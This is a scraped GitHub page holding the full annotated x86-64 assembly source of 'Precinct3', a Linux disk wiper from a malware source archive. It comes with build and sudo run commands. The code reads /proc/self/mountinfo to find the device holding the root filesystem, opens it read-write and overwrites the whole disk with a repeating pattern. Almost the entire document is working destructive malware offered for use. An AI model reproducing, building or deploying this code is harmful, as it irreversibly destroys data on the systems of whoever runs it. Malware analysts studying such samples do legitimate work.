forked from vxunderground/MalwareSourceCode
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathLinux.Precinct3.asm
144 lines (143 loc) · 11.3 KB
/
Linux.Precinct3.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
;;;;;;;;; ;;;;;;;;; ;;;;;;;;; ;;;;;;;;; ;;;;;;;;; ;;; ;;; ;;;;;;;;; ;;;;;;;;;
;;; ;;; ;;; ;;; ;;; ;;; ;;; ;;;; ;;; ;;; ;;;
;;;;;;;;; ;;;;;;;;; ;;;;;; ;;; ;;; ;;; ; ;;; ;;; ;;;
;;; ;;;;;; ;;; ;;; ;;; ;;; ;;;; ;;; ;;;
;;; ;;; ;;; ;;;;;;;;; ;;;;;;;;; ;;;;;;;;; ;;; ;;; ;;;;;;;;; ;;;
;-------------------------------------------------------------------------------
; /!\ WARNING /!\
; This program WILL destroy your disk. Run at your own risk, and only
; on systems you are authorized to destroy.
;
; This program opens /proc/self/mountinfo to enumerate filesystems and disks.
; It finds where the filesystem root (/) is mounted, and writes a pattern to
; the entirety of the disk.
;
; Using /proc/self/mountinfo to find / :
;
; [ EXAMPLE ]
;
; $ grep '/ / ' /proc/self/mountinfo
; 32 1 259:2 / / rw,relatime shared:1 - ext4 /dev/nvme0n1p2 rw,errors=remount-ro
; $ grep '/ / ' /proc/self/mountinfo
; 25 0 8:0 / / rw,relatime shared:1 - ext4 /dev/sda rw,errors=remount-ro
;
; Build:
; $ nasm -f elf64 p3.asm ; ld p3.o -o p3
; Run:
; $ sudo ./p3
;----------------------------------------------------------------- @netspooky --
;;;;;;;;; ;;; ;;; ;;;;;;;;; ;;;;;;;;; ;;;;;;;;;
;;; ;;; ;;; ;;; ;;; ;;; ;;;
;;; ;;;;;;;;; ;;;;;;;;; ;;;;;; ;;;;;;
;;; ;;; ;;; ;;;;;; ;;; ;;;
;;; ;;; ;;; ;;; ;;; ;;;;;;;;; ;;;;;;;;;
;-------------------------------------------------------------------------------
section .text ;
global _start ;
_start: ;
mov rdi, 0x6f666e69 ; Pushing the ;
push rdi ; file name ;
mov rdi, 0x746e756f6d2f666c ; /proc/self/mountinfo ;
push rdi ; onto the stack ;
mov rdi, 0x65732f636f72702f ; ... ;
push rdi ; ... ;
mov rdi, rsp ; const char *pathname ;
xor rsi, rsi ; int flags - O_RDONLY ;
mov rax, rsi ; 0 ;
inc rax ; 1 ;
inc rax ; 2 - open syscall ;
syscall ; ;
reader: ; Reading /proc/self/mountinfo so we can parse it. ;
inc rdx ; 1 ;
shl rdx, 14 ; size_t count - # of bytes to read - 0x400 ;
sub rsp, rdx ; Make space on the stack - 0x400 ;
mov r9, rax ; Save fd in r9 for later ;
mov rdi, rax ; int fd - The file descriptor ;
mov rsi, rsp ; void *buf - The buffer that is the stack ;
xor eax, eax ; 0 - read syscall ;
syscall ; RSI still contains the buffer after syscall ;
mov di, 0x202f ; '/ ' - The byte pattern to look for ;
xor rcx, rcx ; 0 ;
inc rcx ; 1 ;
shl rcx, 14 ; 0x400 - Counter for reading the file chunk ;
comp1: ; Looking for the first slash and space in each entry ;
mov bx, word[rsp] ; Move word to bl ;
cmp di, bx ; Compare to the '/ ' pattern ;
je comp2 ; Disk entry found, onto next comparison ;
dec rcx ; Decrement counter ;
jz xxit ; Jump if zero to the end ;
inc rsp ; Read the next byte in the file ;
jmp comp1 ; Jump back to the top ;
comp2: ; Here we are looking for the next slash and space ;
inc rsp ; Since we already know the two bytes at the ;
inc rsp ; pointer, inc twice to get next two bytes ;
mov bx, word[rsp] ; Move word to bl ;
cmp di, bx ; Make the same comparison to '/ ' ;
je comp3 ; Disk holding / was found ;
dec rcx ; Decrement counter ;
jz xxit ; Jump if zero to the end ;
dec rcx ; Decrement counter ;
jz xxit ; Jump if zero to the end ;
inc rsp ; If we didn't find anything, keep going ;
jmp comp1 ; And back to first comparison ;
comp3: ; At this point, we have located the '/ / ' record, so we can look for ;
; the next slash in the disk name ;
inc rsp ; Increment through the rest of the line ;
mov bl, byte[rsp] ; Get just one byte now ;
cmp dil, bl ; dil contains '/' ;
je prep ; If we found it, we have the disk name ;
jmp comp3 ; If not, keep going ;
prep: ; Preparing for the final comparison ;
xor rcx, rcx ; This will hold the length of the disk name ;
mov dil, 0x20 ; We are now looking for a space. ;
getdisk: ; Here we are grabbing the entire disk name ;
inc rsp ; Increment the index ;
inc rcx ; Increment our length counter ;
mov bl, byte[rsp] ; Grab a byte ;
cmp dil, bl ; Compare to a ' ' char ;
je opendisk ; If it matches, we found it! ;
jmp getdisk ; If not, keep going! ;
opendisk: ; Now we are going to open the disk as a file as we did earlier. ;
xor rsi, rsi ; 0 ;
add rsp, 8 ; Pushing a 0 for the null... ;
push rsi ; ...terminator on the disk name string. ;
sub rsp, rcx ; Now RSP points to the disk name ;
mov rdi, rsp ; const char *pathname - pointer to disk name ;
inc rsi ; 1 ;
inc rsi ; 2 - O_RDWR ;
mov rax, rsi ; 2 - open syscall ;
syscall ;
writer: ; We now have the disk open in RW mode, no append. ;
mov rdi, rax ; int fd - The file descriptor ;
mov rsi, 0x7557575757575775 ; This is the marker payload - uWWWWWWu ;
push rsi ; Push the payload ;
mov rsi, rsp ; const void *buf - Payload pointer ;
xor rax, rax ; 0 ;
inc rax ; 1 - write syscall ;
mov rdx, rax ; Get that 1 ;
shl rdx, 3 ; 8 size_t count - # of bytes to write ;
syscall ;
lseeker: ; We have to set up the lseek call so that we will continue writing ;
; to the next byte in the file upon each additional write. ;
xor rdx, rdx ; 0 ;
inc rdx ; int whence; 1 = SEEK_SET ;
mov rsi, rdx ; 1 ;
shl rsi, 3 ; off_t offset; 8 - # of bytes to seek ;
mov rax, rsi ; 8 - lseek syscall ;
syscall ; Note that RDI still contains fd ;
writer2: ; The final write loop, likely segfaults ;
mov rsi, 0xABACABACABACABAC ; This is the pattern payload ;
push rsi ; Push the payload ;
mov rsi, rsp ; const void *buf - Payload pointer ;
xor rax, rax ; 0 ;
inc rax ; 1 - write syscall ;
mov rdx, rax ; Get that 1 ;
shl rdx, 3 ; 8 size_t count - # of bytes to write ;
syscall ;
jmp writer2 ; Bring it around town ;
xxit: ; This is really only here in case of failure ;
mov al, 0x3c ; exit syscall ;
xor rdi, rdi ; 0 - Return code ;
syscall ;------------------------------------------------------------------;
; Dedicated to those fighting for police accountability worldwide. ;
;------------------------------------------------------------------;